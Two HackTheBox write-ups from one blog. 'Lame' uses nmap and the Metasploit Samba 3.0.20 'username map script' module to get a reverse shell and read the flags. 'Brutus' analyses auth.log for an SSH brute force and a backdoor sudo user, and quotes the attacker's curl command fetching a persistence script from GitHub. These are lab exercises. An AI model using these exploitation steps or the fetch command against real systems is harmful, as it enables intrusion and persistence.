[HTB] Machine - Lame

neiwad_ — Sun, 05 May 2024 19:53:12 +0000

Step 1: preparation

Connect to the VIP HTB VPN
Add $IP variable to shell for faster operation

IP=10.10.X.X
echo $IP

Step 2: enumeration

I first start with a basic nmap scan

nmap $IP

This scan returns Host seems down. If it is really up, but blocking our ping probes, try -Pn

So I try with the related flag

nmap -Pn $IP

And it returns that 4 ports are available

Given that, I make a more precise (and longer) scan

nmap -Pn -sV -sC $IP

I can see that vsFTPd is on version 2.3.4 and samba is on version 3.0.20.

It should be enough for exploitation.

Step 3: exploitation

Samba 3.0.20

A little search on the msfconsole give me a result nammed Samba "username map script" Command Execution.

I so use this module and check which options are available

msf > use 0
msf > show options

The RHOSTS is empty and requiered, so I set it up

msf > set RHOSTS $IP (replace $IP with the real target IP)

NOTE: The LHOST need to be setted up with the HTB VPN TUN interface, not your local IP.

And then I launch the exploit

msf > exploit

I am now in a reversed shell!

cd home
ls
- ftp
- makis
- service
- ...
cd makis
ls
- user.txt
cat user.txt

The user flag is done.

For root, I come back the root of the shell, I navigate to the root folder and I get the root.txt file.

Step 4: that's it

If you want to subscribe to the HackTheBox Academy, you can use my referral link!

[HTB] Sherlock - Brutus

neiwad_ — Sun, 05 May 2024 18:07:27 +0000

Hello, this is my writeup for the Brutus Sherlock on HackTheBox.

Step 1: preparation

In a first step, I download the zip file and I use the password given to extract the archive.

There is two files inside:

auth.log (linux file that keep track of authentication, whereas they are successful or not)
wtmp (keep track of terminal creation or terminal assignement for users)

I first wanted to do this sherlock on my macbook, but the wtmp file is hard to open on a mac, so I sent these files to my kali vm.

scp -r Brutus/ KALI_USER@VM_IP:~/Desktop

Step 2: analysis

Question 1: Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?

After a small analysis of the auth.log, I can see that starting at 06:31:31, there is a lot of invalid user & password from IP 65.2.161.68.

Question 2: The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?

I continue to deep dive into the auth.log and I can see that at 06:31:40, there is an accepted password for root from the above brute force IP (65.2.161.68).

Question 3: Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?

As we can see, after that the brute force attack successfully find the root password, some other authentication failed form the same IP, so the brute force attack is still in progress.

Later on the file, at 06:32:44, I can see that the root user has recreated a session from the attacker’s IP.

The timestamp 06:32:44 doesn’t works for answer, so I need to go inside wtmp file to check for the real timestamp of the root terminal, but the file seems to be corrupted on my side and it’s quite empty.
I choosed to go to the official write-up to get the timestamp 06:32:45.

Question 4: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

Quite simple, under the successful login for root from attacker’s IP, we can see new session 37 for user root.

Question 5: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

Still on the auth.log, I can see at 06:34:18 that a group cyberjunkie and a user were created.

Later, at 06:35:15, the cyberjunkie user is added to group sudo.

Question 6: What is the MITRE ATT&CK sub-technique ID used for persistence?

After a little bit of research, the following sub-technique seems to be the related one.

Question 7: How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)

So the session started at 06:32:45 (question 3), and on the auth.log I can see that the session 37 was closed 06:37:24, after some crazy maths: 279 sec.

Question 8: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

At 06:37:34 a new session was created for the user cyberjunkie.

At 06:39:38 he launched a command as sudo that is:

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

Step 3: that's it

It was my first Sherlock on HTB and it was really fun!

If you want to subscribe to the HackTheBox Academy, you can use my referral link!

DEV Community: neiwad_

[HTB] Machine - Lame

Step 1: preparation

Step 2: enumeration

Step 3: exploitation

Samba 3.0.20

Step 4: that's it

[HTB] Sherlock - Brutus

Step 1: preparation

Step 2: analysis

Question 1: Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?

Question 2: The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?

Question 3: Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?

Question 4: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

Question 5: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

Question 6: What is the MITRE ATT&CK sub-technique ID used for persistence?

Question 7: How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)

Question 8: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

Step 3: that's it